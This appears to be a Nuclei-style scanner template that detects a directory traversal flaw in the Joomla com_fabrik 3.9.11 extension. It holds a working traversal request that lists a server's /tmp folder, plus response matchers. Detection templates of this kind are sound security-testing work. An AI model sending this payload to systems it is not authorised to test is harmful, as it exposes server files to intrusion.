id: joomla-com-fabrik-lfi

info:
  name: Joomla! com_fabrik 3.9.11 - Directory Traversal
  author: dhiyaneshDk
  severity: high
  reference:
    - https://www.exploit-db.com/exploits/48263
  tags: joomla,lfi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"value":'
          - '"disable":false'
          - 'text'
        part: body
        condition: and

      - type: status
        status:
          - 200
